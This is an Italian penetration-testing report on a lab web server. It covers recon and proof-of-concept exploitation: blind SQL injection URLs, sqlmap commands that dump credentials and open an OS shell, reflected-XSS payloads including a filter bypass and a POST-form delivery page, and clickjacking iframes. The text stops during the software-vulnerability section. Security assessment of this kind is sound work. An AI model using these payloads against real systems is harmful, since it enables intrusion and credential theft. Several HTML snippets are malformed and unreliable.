---
title: Penetration Testing Report
subtitle: Michelangelo
author:
	- Andrea Chimenti 
	- Filippo Faldetta
lang: it
toc: true
numbersections: true
linkcolor: blue
toccolor: blue
urlcolor: blue
header-includes: \definecolor{gold}{rgb}{1.0, 0.84, 0.0}
---

\newpage

# Introduzione

In questo documento andremo ad analizzare il sito raggiungibile all'indirizzo 
`172.17.0.2`.

Lo scopo di tale analisi è la ricerca di vulnerabilità che possano rappresentare 
un problema per la sicurezza. Descriveremo poi come porre rimedio alle vulnerabilità 
da noi scoperte.

Possiamo anticipare che abbiamo trovato un buon numero di vulnerabilità.
Senza entrare troppo nel dettagio possiamo dire che ciò che più rappresenta 
una minaccia per il sistema in analisi è:

- la sbagliata gestione dell'input del sito, che permette non solo di ricavare 
	informazioni, ma anche di eseguire codice (sia nel front-end che nel 
	back-end) e di estrapolare informazioni sugli utenti tra cui le password
- la mancanza di cifratura per le informazioni sensibili, che, essendo 
	passate in chiaro, sono facili vittime di campagne di intercettazione
- il mancato utilizzo di opzioni di sicurezza, che facilita l'attaccante 
	in molteplici operazioni ostili
- l'utilizzo di software non aggiornato, che permette di attaccare il sistema in 
	molteplici modi

# Metodologia 

Nel prossimo capitolo andremo ad analizzare la macchina alll'indirizzo `172.17.0.2`.
Per fare ciò useremo sia tool automatici, sia operazioni manuali.
Inizieremo da una fase di raccolta delle informazioni, procederemo poi a cercare 
le vulnerabilità; proveremo poi a sfruttare queste, nel modo più innocuo possibile, 
per confermare la minaccia che rappresentano per il sistema.
Infine, descriveremo come porre rimedio alle vulnerabilità scoperte.

\newpage

# Scoperte 

## Raccolta delle informazioni

### Metadati delle immagini

La prima cosa che abbiamo notato è che il sito ha delle immagini, in particolare 
quattro, tre rappresentano macchine, l'altra il logo del sito web.

Abbiamo quindi deciso di di effettuare un'analisi dei metadati su tali immagini.


```sh
$ exiftool pictures/1.jpg

ExifTool Version Number         : 12.04
File Name                       : 1.jpg
Directory                       : pictures
File Size                       : 208 kB
File Modification Date/Time     : 2020:08:16 15:44:43+02:00
File Access Date/Time           : 2020:08:16 15:46:18+02:00
File Inode Change Date/Time     : 2020:08:16 15:46:18+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Current IPTC Digest             : a2197b5a27059783e7214446f4540e3e
Coded Character Set             : UTF8
Envelope Record Version         : 4
Document Notes                  : https://flickr.com/e/
	HVCzaS1PbpjsYqZUucZ92jqJxgdhPvV43hAMgQDLtkQ%3D
Application Record Version      : 4
JFIF Version                    : 1.02
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Profile CMM Type                : Adobe Systems Inc.
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1999:06:03 00:00:00
Profile File Signature          : acsp
Primary Platform                : Apple Computer Inc.
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : none
Device Model                    : 
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Adobe Systems Inc.
Profile ID                      : 0
Profile Copyright               : Copyright 1999 Adobe Systems Incorporated
Profile Description             : Adobe RGB (1998)
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Tone Reproduction Curve     : (Binary data 14 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 14 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 14 bytes, use -b option to extract)
Red Matrix Column               : 0.60974 0.31111 0.01947
Green Matrix Column             : 0.20528 0.62567 0.06087
Blue Matrix Column              : 0.14919 0.06322 0.74457
Image Width                     : 1024
Image Height                    : 683
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1024x683
Megapixels                      : 0.699
```

```sh
$ exiftool pictures/2.jpg

ExifTool Version Number         : 12.04
File Name                       : 2.jpg
Directory                       : pictures
File Size                       : 156 kB
File Modification Date/Time     : 2020:08:16 15:44:48+02:00
File Access Date/Time           : 2020:08:16 15:46:18+02:00
File Inode Change Date/Time     : 2020:08:16 15:46:18+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Artist                          : Jim Geuther
Copyright                       : Copyright (c) 1993-2018 Jim GeutherÂ 
Current IPTC Digest             : 4b8af5b2105ceeb37ee38434e2a6dc72
Coded Character Set             : UTF8
Envelope Record Version         : 4
Document Notes                  : https://flickr.com/e/
	wsk33swoJiBkjPO4OfVNSAwic5oYYTaGRHbp8fxFGCo%3D, 
	Email:jim.geuther@gmail.com, 
	URL:facebook
Copyright Notice                : Copyright (c) 1993-2018 Jim Geuther 
By-line                         : Jim Geuther
Application Record Version      : 4
JFIF Version                    : 1.02
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 1024
Image Height                    : 682
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:2 (2 1)
Image Size                      : 1024x682
Megapixels                      : 0.698
```

```sh 
exiftool pictures/3.jpg

ExifTool Version Number         : 12.04
File Name                       : 3.jpg
Directory                       : pictures
File Size                       : 169 kB
File Modification Date/Time     : 2020:08:16 15:45:04+02:00
File Access Date/Time           : 2020:08:16 15:46:18+02:00
File Inode Change Date/Time     : 2020:08:16 15:46:18+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Artist                          : Jim Geuther
Copyright                       : Copyright (c) 1993-2018 Jim GeutherÂ 
Current IPTC Digest             : 08d013e786b92c93469c28186f89d2fc
Coded Character Set             : UTF8
Envelope Record Version         : 4
Document Notes                  : https://flickr.com/e/
	KJNdQLlxOiK5REqQCA%2FT5FaF9BayvQOH31%2BEp0WJdCA%3D, 
	Email:jim.geuther@gmail.com, 
	URL:facebook
Copyright Notice                : Copyright (c) 1993-2018 Jim Geuther 
By-line                         : Jim Geuther
Application Record Version      : 4
JFIF Version                    : 1.02
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 1024
Image Height                    : 682
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:2 (2 1)
Image Size                      : 1024x682
Megapixels                      : 0.698
```


```sh
exiftool pictures/mic.png

ExifTool Version Number         : 12.04
File Name                       : mic.png
Directory                       : pictures
File Size                       : 8.7 kB
File Modification Date/Time     : 2020:08:16 15:44:34+02:00
File Access Date/Time           : 2020:08:16 15:46:18+02:00
File Inode Change Date/Time     : 2020:08:16 15:46:18+02:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 1200
Image Height                    : 1200
Bit Depth                       : 4
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Gamma                           : 2.2
SRGB Rendering                  : Perceptual
Palette                         : (Binary data 18 bytes, use -b option to extract)
Image Size                      : 1200x1200
Megapixels                      : 1.4
```

Le prime tre immagini (quelle rappresentanti macchine) originano dal sito web 
[flickr](https://flickr.com), tale informazione ci fa capire in primis che le 
immagini non possiedono informazioni circa il sistema bersaglio, in secondo 
luogo spiega le differenze presenti tra i metadati.

I metadati dell'ultima immagine, che potrebbe essere stata prodotta dall'autore 
del sistema bersaglio, sono non solo diversi da quelli delle tre precedenti, 
ma anchi più scarsi.

### Whois

Abbiamo poi deciso di avvalerci del tool `whois` per ricavare informazioni 
circa l'indirizzo IP del target.

```sh
$ whois 172.17.0.2

NetRange:       172.16.0.0 - 172.31.255.255
CIDR:           172.16.0.0/12
NetName:        PRIVATE-ADDRESS-BBLK-RFC1918-IANA-RESERVED
NetHandle:      NET-172-16-0-0-1
Parent:         NET172 (NET-172-0-0-0-0)
NetType:        IANA Special Use
OriginAS:       
Organization:   Internet Assigned Numbers Authority (IANA)
RegDate:        1994-03-15
Updated:        2013-08-30
Comment:        These addresses are in use by many millions of independently operated 
	networks, which might be as small as a single computer connected to a home gateway, 
	and are automatically configured in hundreds of millions of devices.  They are only 
	intended for use within a private context and traffic that needs to cross the 
	Internet will need to use a different, unique address.
Comment:        
Comment:        These addresses can be used by anyone without any need to coordinate 
	with IANA or an Internet registry.  The traffic from these addresses does not come
	from ICANN or IANA.  We are not the source of activity you may see on logs or in 
	e-mail 	records.  Please refer to http://www.iana.org/abuse/answers
Comment:        
Comment:        These addresses were assigned by the IETF, the organization that 
	develops Internet protocols, in the Best Current Practice document, RFC 1918 
	which can be found at: 
Comment:        http://datatracker.ietf.org/doc/rfc1918
Ref:            https://rdap.arin.net/registry//ip/172.16.0.0



OrgName:        Internet Assigned Numbers Authority
OrgId:          IANA
Address:        12025 Waterfront Drive
Address:        Suite 300
City:           Los Angeles
StateProv:      CA
PostalCode:     90292
Country:        US
RegDate:        
Updated:        2012-08-31
Ref:            https://rdap.arin.net/registry//entity/IANA


OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName:   ICANN
OrgAbusePhone:  +1-310-301-5820 
OrgAbuseEmail:  abuse@iana.org
OrgAbuseRef:    https://rdap.arin.net/registry//entity/IANA-IP-ARIN

OrgTechHandle: IANA-IP-ARIN
OrgTechName:   ICANN
OrgTechPhone:  +1-310-301-5820 
OrgTechEmail:  abuse@iana.org
OrgTechRef:    https://rdap.arin.net/registry//entity/IANA-IP-ARIN
```

Come ci aspettavamo, i risultati ci suggeriscono semplicemente che l'indirizzo 
della macchina bersaglio è un indirizzo privato. Tale informazione è compatibile con 
il fatto che la macchina bersaglio è in esecuzione in una sottorete locale.

### Scansione della rete

Questa fase prevede la scansione della rete della vittima. Sapendo tuttavia 
che questa è una singola macchina remota, possiamo evitare di scansionare la 
sua rete e passare direttamente ad un'analisi della macchina stessa.

Abbiamo deciso quindi di scansionare l'indirizzo `172.17.0.2` della macchina 
bersaglio alla ricerca delle porte aperte. Per fare cio' abbiamo usato il tool 
`nmap`.

```sh
$ sudo nmap -sS 172.17.0.2 -p0-65535

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 16:42 CEST
Nmap scan report for 172.17.0.2
Host is up (0.00013s latency).
Not shown: 65535 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds
```

Si nota che la macchina bersaglio ha la porta 80 aperta, hostando 
un servizio HTTP.
Questo significa che, con molta probabilità, in seguito potremmo spostare la 
nostra attenzione proprio sulla pagina hostata.

Abbiamo anche effettuato un analisi sulle 1000 porte più frequenti con UDP, 
tuttavia non abbiamo ottenuto risultati interessanti.

```sh
sudo nmap -sU 172.17.0.2 --top-ports 1000 -v

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 17:33 CEST
Initiating Ping Scan at 17:33
Scanning 172.17.0.2 [4 ports]
Completed Ping Scan at 17:33, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:33
Completed Parallel DNS resolution of 1 host. at 17:33, 0.05s elapsed
Initiating UDP Scan at 17:33
Scanning 172.17.0.2 [1000 ports]
Completed UDP Scan at 17:51, 1084.62s elapsed (1000 total ports)
Nmap scan report for 172.17.0.2
Host is up (0.00037s latency).
All 1000 scanned ports on 172.17.0.2 are closed

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1084.83 seconds
           Raw packets sent: 1452 (42.071KB) | Rcvd: 1098 (62.732KB)
```

### Banner grabbing

Dato che abbiamo visto che un servizio è hostato sulla porta 80 abbiamo deciso 
di effettuare l'operazione nota come banner grabbing.
Abbiamo utilizzato diversi tool per adempire al solito compito per cercare di ottenere più
informazioni possibili.

```sh
$ telnet 172.17.0.2 80

Trying 172.17.0.2...
Connected to 172.17.0.2.
Escape character is '^]'.
HEAD / HTTP/1.1
HOST: 127.0.0.1

HTTP/1.1 200 OK
Date: Tue, 18 Aug 2020 08:31:32 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.2.31
Content-Type: text/html; charset=UTF-8

Connection closed by foreign host.
```

Con `nc` abbiamo deciso di passare l'input mediante una pipe per problemi 
legati al carattere per andare a capo, infatti `nc` si aspetta `\r\n` invece 
del solo `\n` fornito dai sistemi \*nix.

```sh
$ echo "HEAD / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n" | nc 172.17.0.2 80

HTTP/1.1 200 OK
Date: Tue, 18 Aug 2020 09:25:13 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.2.31
Content-Type: text/html; charset=UTF-8
```

```sh 
$ sudo nmap -sV -p80 172.17.0.2

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 11:30 CEST
Nmap scan report for 172.17.0.2
Host is up (0.00026s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))

Service detection performed. Please report any incorrect results at 
	https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.65 seconds
```

Abbiamo poi provato ad utilizzare anche Metasploit.

```sh
msf5 auxiliary(scanner/http/http_version) > set rhosts 172.17.0.2
rhosts => 172.17.0.2
msf5 auxiliary(scanner/http/http_version) > set rport 80
rport => 80
msf5 auxiliary(scanner/http/http_version) > exploit

[+] 172.17.0.2:80 Apache/2.4.38 (Debian) ( Powered by PHP/7.2.31 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Abbiamo visto che il sito in analisi usa `Apache 2.4.38`, probabilmente su 
`Debian`, e `PHP 7.2.31`.

### Rilevamento del SO

Abbiamo deciso, a questo punto, di cercare il sistema operativo della 
macchina che vogliamo attaccare. Dalla fase precedente abbiamo ipotizzato 
che si tratti di *Debian*, vorremmo tuttavia avere informazioni più precise.

Per prima cosa abbiamo deciso di utilizzare `nmap`.

```sh
$ sudo nmap -O -v 172.17.0.2                

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 15:41 CEST
Initiating Ping Scan at 15:41
Scanning 172.17.0.2 [4 ports]
Completed Ping Scan at 15:41, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:41
Completed Parallel DNS resolution of 1 host. at 15:41, 0.04s elapsed
Initiating SYN Stealth Scan at 15:41
Scanning 172.17.0.2 [1000 ports]
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 15:41, 0.05s elapsed (1000 total ports)
Initiating OS detection (try #1) against 172.17.0.2
Retrying OS detection (try #2) against 172.17.0.2
Retrying OS detection (try #3) against 172.17.0.2
Retrying OS detection (try #4) against 172.17.0.2
Retrying OS detection (try #5) against 172.17.0.2
Nmap scan report for 172.17.0.2
Host is up (0.00019s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
No exact OS matches for host (If you know what OS is running on it, 
	see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/18%OT=80%CT=1%CU=32477%PV=Y%DS=2%DC=I%G=Y%TM=5F3BDA9
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST1
OS:1NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 6.213 days (since Wed Aug 12 10:34:53 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros

Read data files from: /usr/bin/../share/nmap
OS detection performed. Please report any incorrect results at 
	https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds
           Raw packets sent: 1114 (53.042KB) | Rcvd: 1126 (345.613KB)
```

Come possiamo vedere, l'output ci comunica che non c'è stato modo di rilevare 
il SO della macchina a `172.17.0.2`, tuttavia leggiamo, anche se in modo confuso, 
`x86_64-pc-linux-gnu`.

Abbiamo deciso di proseguire quest'indagine mediante il tool `xprobe2`; ci siamo 
però imbattuti in un problema già noto, ovvero l'output non leggibile.
Abbiamo cercato senza successo una soluzione a tale problema, tra cui la 
compilazione manuale della versione attuale, nonché delle versioni precedenti.

Come mostreremo di seguito anche il tool `p0f` (con 200 pacchetti riguardanti 
`172.17.0.2`) non è riuscito a rilevare il SO della vittima.

```sh
| server   = 172.17.0.2/80
| os       = ???
| dist     = 1
| params   = none
| raw_sig  = 4:63+1:0:1460:mss*45,7:mss,sok,ts,nop,ws:df:0
```

Abbiamo quindi analizzato le basi dell *OS fingerprinting*, trovando che le 
prime informazioni da tenere in considerazione sono `ttl` e dimensione della 
finestra `TCP`.
Abbiamo quindi usato le utility `ping` e `wireshark` per rilevare tali 
informazioni, senza però raggiungere il nostro obiettivo.


```sh
$ ping 172.17.0.2

PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=63 time=0.157 ms
```

Si nota quindi che le operazioni di fingerprinting risultano difficili in 
quanto i parametri di comunicazioni usati dal target sono diversi dai valori 
di default dei SO.

Tuttavia dallo sniffing effettuato con `Wireshark`, sia per p0f che per 
trovare la dimensione della finestra, abbiamo scoperto che username e 
password vengono trattati in chiaro, possono quindi essere rilevati 
ed usati da un'ipotetico attaccante.

### Ricapitolando

Abbiamo raccolto informazioni circa la macchina che vogliamo testare, derivanti
da programmi diversi.
In particolare sappiamo che:

- le immagini provengono da [flickr](https://flickr.com) e/o non forniscono
	informazioni utili
- l'indirizzo IP `172.17.0.2` è un indirizzo privato, ciò conferma quello che 
	già sapevamo, ovvero che il bersaglio è nella nostra sottorete locale
- il bersaglio ha la porta `80` aperta (`HTTP`)
- i sw usati per hostare la pagina web sono:
	-  Apache 2.4.38 (Debian) 
	-  PHP 7.2.31
- il sistema operativo potrebbe essere Debian (gnu/linux), anche se mancano 
	evidenze da parte dei sw specializzati

\newpage

## Ricerca delle vulnerabilità e relative PoC

Raccolte le informazioni necessarie, proseguiamo con la fase di ricerca ed 
analisi delle vulnerabilità della vittima.

Per effettuare tale procedura abbiamo deciso di effettuare sia analisi 
manuali che automatiche.
Per quanto riguarda le analisi automatiche abbiamo usato sia `gvm` (ex `openvas`)
sia Owasp ZAP (`zaproxy`).

### Blind SQLi [\textcolor{red}{HIGH}]

Dall'output di ZAP abbiamo rilevato la possibilità di procedere con un attacco di tipo
Blind SQLi. Come primo tentativo abbiamo utilizzato l'esempio che ci ha fornito il tool automatico:

```
http://172.17.0.2/detail.php?id=3%27+AND+%271%27%3D%271%27+--+
```

![Risultato di injection riuscita](./pictures/sql-success.png)

Si noti come è possibile, tramite l'URL, andare ad attuare un Blind SQLi. La sudetta query, inserità alla fine dell'URL',
con valore di verità TRUE, ci fa vedere effettivamente la pagina desiderata. 
Abbiamo provveduto a utilizzare anche un altro URL con una condizione di verità FALSE nella query.

```
http://172.17.0.2/detail.php?id=3%27+AND+%271%27%3D%270%27+--+
```

Come ci aspettavamo, da questo URL ci è comparso un messaggio di errore:

![Schermata di errore](./pictures/sql-failure.png)

Come ultima conferma abbiamo provveduto all'utilizzo del metodo `sleep`. Come ci aspettavamo, i risultati
sono giunti con il ritardo previsto.

![Query con sleep e "cronometro"](./pictures/sql-sleep.png)

Continuando con le prove manuali di Blind SQLi, abbiamo ricavato due pagine nascoste in cui al posto della vendita di 
autovetture erano presenti dei carrarmati. Semplicemente siamo andati a modificare l'id della pagina che volevamo:

```
http://172.17.0.2/detail.php?id=4
```

![Carro armato 1](./pictures/m-tank-1.png)

```
http://172.17.0.2/detail.php?id=5
```

![Carro armato 2](./pictures/m-tank-2.png)

Con l'utilizzo del tool `sqlmap` siamo riusciti ad entrare nei vari database utilizzati dal sito. 
Nello specifico siamo riusciti a ricavare :

- username e password del database
- tabelle
- contenuto delle tabelle (tra cui le tabelle interne del DB)
	- username e password del sito
	- tabella delle immagini

Per quanto riguarda le password, l'utilizzo del tool ci ha permesso di automatizzare la fase di cracking degli
hash. Tale operazione è stata possibile in quanto le password usate non sono risultate robuste;
la loro dimensione ed il loro valore ha reso tale operazione decisamente veloce.
Inoltre sarebbe stato possibile, dalla pagina di login, effettuare un attacco a forza bruta/dizionario, sfruttando anche 
il tool `hydra`.

Mostreremo ora i comandi che abbiamo usato e le parti dell'output più significative.

``` sh
$ sqlmap -u "http://172.17.0.2/detail.php?id=1" 
	--not-string="This product is not in our catalog" --users --password -v 0

back-end DBMS: MySQL >= 5.0 (MariaDB fork)
database management system users [2]:
[*] 'admin'@'localhost'
[*] 'root'@'localhost'

database management system users password hashes:
[*] admin [1]:
    password hash: *6207EE3F049D8F87CC0B4BBB8814917B31FB8E4F
    clear-text password: dbpassword
[*] root [1]:
    password hash: NULL
```

```sh
$ sqlmap -u "http://172.17.0.2/detail.php?id=1" 
	--not-string="This product is not in our catalog" --tables --columns -v 0

Database: micdb
[2 tables]
+----------------------------------------------------+
| customers                                          |
| products                                           |
+----------------------------------------------------+

Database: micdb
Table: products
[5 columns]
+---------+----------------------+
| Column  | Type                 |
+---------+----------------------+
| id      | smallint(5) unsigned |
| name    | varchar(32)          |
| picture | varchar(64)          |
| price   | varchar(16)          |
| priv    | tinyint(1)           |
+---------+----------------------+

Database: micdb
Table: customers
[4 columns]
+----------+----------------------+
| Column   | Type                 |
+----------+----------------------+
| id       | smallint(5) unsigned |
| password | varchar(32)          |
| priv     | tinyint(1)           |
| username | varchar(20)          |
+----------+----------------------+
```

```sh
$ sqlmap -u "http://172.17.0.2/detail.php?id=1" 
	--not-string="This product is not in our catalog" --dump -v 0

Database: micdb                                                                                                                                                
Table: customers
[5 entries]
+----+------+----------------------------------------------+-------------+
| id | priv | password                                     | username    |
+----+------+----------------------------------------------+-------------+
| 1  | 1    | 0a14de5a76e5e14758b04c209f266726 (adminpwd)  | admin       |
| 2  | 1    | c64155fcefdf6b53889ec08581742982 (mindif)    | mindif      |
| 3  | 1    | 6cb75f652a9b52798eb6cf2201057c73 (password2) | replibafr   |
| 4  | 0    | c5e38d2fb6e844b0832dc1269dd0cde2             | mario.rossi |
| 5  | 0    | 8b461191e6b0705ec1ce1199a20f370e (powerful)  | max.power   |
+----+------+----------------------------------------------+-------------+

Database: micdb
Table: products
[5 entries]
+----+---------+------+--------+---------+
| id | name    | priv | price  | picture |
+----+---------+------+--------+---------+
| 1  | Classic | 0    | 80000$ | 1.jpg   |
| 2  | Race    | 0    | 40000$ | 2.jpg   |
| 3  | Sport   | 0    | 25000$ | 3.jpg   |
| 4  | Sherman | 1    | 80000$ | 4.jpg   |
| 5  | Tiger   | 1    | 80000$ | 5.jpg   |
+----+---------+------+--------+---------+
```

In oltre è stato possibile, sempre tramite il tool, andare ad aprire una shell sfruttando PHP.
Questa shell viene aperta come utente `www-data` con `uid`, `gid` e `group` uguali a `33`. 
Si potrebbe pensare di procedere con una *privilege escalation*.

```sh
$ sqlmap -u "http://172.17.0.2/detail.php?id=1" 
	--not-string="This product is not in our catalog" --os-shell -v 0

os-shell> whoami
'www-data'

os-shell> id
'uid=33(www-data) gid=33(www-data) groups=33(www-data)'

os-shell> pwd
'/var/www/html'

os-shell> ls
command standard output:
---
catalog.php
config.php
debug.php
detail.php
index.php
login.php
logout.php
mic.png
pic
recovery.php
send.php
tmpbvknd.php
tmpujyoa.php
welcome.php
---
```

I due file, il cui nome inizia con `tmp`, sono stati usati da sqlmap per aprire il 
terminale. Uno viene usato per caricare i file sul server (il file stager), 
l'altro permette di eseguire il terminale che abbiamo usato.

### Reflected XSS [\textcolor{red}{HIGH}]

Le analisi che abbiamo effettuato ci hanno fatto scoprire un *tainted flow* 
nella pagina del recupero password
[`http://172.17.0.2/recovery.php`](http://172.17.0.2/recovery.php).

![Pagina di recupero password](./pictures/m-recovery.png)

Abbiamo quindi sfruttato tale flusso per inserire nella pagina uno script.
Abbiamo tentato dapprima ad inserire `<script> alert('foobar'); </script>`
senza però ottenere il risultato desiderato.

Abbiamo tuttavia aggirato le operazioni di filtraggio riformulando la stringa 
come `<SCRIPT> alert('foobar'); </SCRIPT>`.

![PoC del flusso contaminato](./pictures/m-xss-upper-success.png)

Poichè tale codice è stato eseguito due volte dalla medesima pagina, 
abbiamo analizato il suo codice sorgente ed abbiamo notato che la 
pagina presenta diversi punti in cui è possibile richiamare codice 
javascript.

![Punti di ignezione nel codice](./pictures/xss-code.png)

Proprio a causa di tale ripetizione nel codice, è possibile utilizzare 
metodi diversi di invocazione del codice javascript; in particolare:

- `" onMouseOver="alert(1);`
- `<b onmouseover=alert('foobar!')>foobar</b>`
- `<IMG SRC='x' onerror=alert(foobar)>`
- `<body onload=alert('foobar')>`

Come è noto, un tainted flow è condizione necessaria ma non sufficiente 
per effettuare un attacco XSS (nel nostro caso di tipo reflected), serve anche 
un modo per diffondere la pagina compromessa.
Solitamente lo script viene passato tramite tramite l'url. 
Ciò è possibile solo se la pagina si affida al metodo `HTTP` `GET`, purtroppo la 
pagina in questione usa il metodo `POST`, quindi non possiamo affidarci alle 
tecniche già viste. 

Appreso però che il parametro utilizzato per trasmettere la mail ha nome 
`mail`, come evidenziato nella seguente richiesta: 

![Richiesta POST](./pictures/xss-post-request.png)

intercettata tramite `burpsuite`, abbiamo capito che per sfruttare il flusso di 
dati in analisi è necessario inviare la richiesta con lo script come parametro 
tramite il metodo `POST`; ciò può essere fatto con il seguente codice:

```html
<form method="post" action="http://172.17.0.2/recovery.php" class"inline}{
  <input type="hidden" name="mail" value="<body onload=alert('foobar')>}{
  <button type="submit" name="submit_param" value="submit_value" class="link_button}{
    There is a problem, chick here to reload the page
  </button>
</form>
```

Il codice appena mostrato genera un bottone

![XSS tramite richiesta POST](./pictures/xss-post-button.png) 

tale bottone reindirizza alla 
pagina di recupero password, dove però lo script è già stato caricato all'
interno della pagina, dando origine al seguente risultato:

![PoC di XSS tramite richiesta POST](./pictures/xss-post-exec.png)

### Password in chiaro [\textcolor{orange}{MEDIUM}]

Come avevamo già notato durante la fase di 
[raccolta delle informazioni](#rilevamento-del-so), username e password 
vengono passati in chiaro dalla pagina come parametri `POST`.

![Pagina di login](./pictures/m-password.png)

Dalla pagina appena mostrata viene inviata la seguente richiesta:

![Richiesta di login con username e password in chiaro](./pictures/password-post.png)

nella quale sono evidenziati i parametri in chiaro.

Tale vulnerabilità indica che un attacante potrebbe facilmente rilevare i dati 
che abbiamo appena evidenziato, mediante un attacco MITM.
Tali credenziali potrebbero essere usate non solo per trafugare infomazioni 
rilevanti per quanto riguarda l'account di un utente (o di un amministratore) 
in relazione alla piattaforma, ma anche per violare altri account dell'utente 
in questione.

Se la vulnerabilità in analisi potesse essere usata come *lateral movement*, come 
per effettuare un attacco di tipo *stored XSS*, o per ottenere informazioni circa 
gli utenti, la nostra classificazione sarebbe stata HIGH.

### Clickjacking [\textcolor{orange}{MEDIUM}]

Le pagine hostate dalla macchina bersaglio sono risultate un possibile vettore 
di attacchi di tipo *clickjacking*.
Tale vulnerabilità è causata dalla mancanza del settaggio di 
`X-Frame-Options`.
Tale opzione permette di limitare o impedire l'utilizzo del sito sotto forma di frame.

Per testare i possibili utilizzi di tale vulnerabilità abbiamo dapprima creato la 
seguente pagina web:

```html
<html>
  <head>
    <title>FooBar</title>
  </head>
  <body>
    <p>FooBar</p>
    <iframe src="http://172.17.0.2/" width="500" height="500}{</iframe>
  </body>
</html>
```

![Pagina con frame dal sito Michelangelo](./pictures/m-frame.png)

La pagina appena mostrata potrebbe bastare per sottolineare la vulnerabilità in analisi, 
tuttavia, per meglio evidenziare come tale attacco potrebbe essere portato a compimento, 
abbiamo deciso di creare un ulteriore pagina web:

```html
<head>
  <title>FooBar</title>
  <style>
    #decoy_website {
      position:absolute;
      width:500px;
      height:500px;
      z-index:1;
      }
  </style>
</head>

<body>
  <div id="decoy_website}{
	<!-- bad content -->
  </div>
  <iframe src="http://172.17.0.2" width=500px height=500px>
</body>
```

![Pagina con frame e contenuti sovraposti](./pictures/m-clickjacking.png)

Come possiamo vedere è molto semplice sovrapporre contenuti, che potrebbero essere malevoli, 
a quelli autentici della pagina del frame in modo che l'ignara vittima clicchi 
su un layer trasparente, invece di cliccare sulla pagina all'interno del frame.

Tale vulnerabilità può essere sfruttata sulle seguenti pagine:

- home page (e index.php)
- catalog.php
- detail.php
- login.php
- recovery.php

### Vulnerabilità del software [\textcolor{orange}{MEDIUM}-\textcolor{red}{HIGH}]

Durante la fase di [banner grabbing](#banner-grabbing) abbiamo osservato che 
il sito in analisi si affida a due software noti: Apache e PHP.

